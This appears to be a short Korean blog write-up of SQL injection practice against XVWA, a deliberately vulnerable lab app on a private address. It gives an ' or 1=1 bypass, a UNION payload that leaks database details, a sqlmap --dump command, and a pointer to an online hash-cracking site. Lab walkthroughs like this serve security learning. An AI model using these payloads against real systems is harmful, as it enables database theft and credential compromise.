XVWA SQLinjection
[그림 1]
Summary
[그림1] 는 SQL Injection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다.
Description
[그림 1] 에서 Search 입력 폼에 ' or 1=1 -- 입력 시 특수문자에 대한 필터링이 존재하지 않아 SQLInjection 에 취약한 결과가 나오는것을 확인이 가능합니다.
UNION SQLInjection
1' AND 1=0 UNION ALL SELECT 1,@@version,database(),@@datadir,5,6,7#
Steps to reproduce
1. 임의의 문자열을 입력 후 Submit 을 누르는 동시에 패킷을 캡쳐합니다.
패킷을 캡처한 이유는 GET 통신이 아닌 POST 방식을 통해 데이터가 현재 전달되고있으므로 패킷을 통해 Body 데이터 정보의 매개변수를 확인하기 위해서입니다.
2. 캡쳐한 패킷은 다음과 같습니다.
3. sqlmap -u "http://192.168.56.109/xvwa/vulnerabilities/sqli_blind/" --data "item=&search=1234
" -p search --dump
4. password 로 크랙되어있는 문자열들은 다음 사이트를 통해 크랙이 가능합니다.
https://www.onlinehashcrack.com/hash-identification.php
Impact
공격자는 SQL Injection 을 통해 데이터베이스 계정정보를 획득할수있습니다.
댓글
댓글 쓰기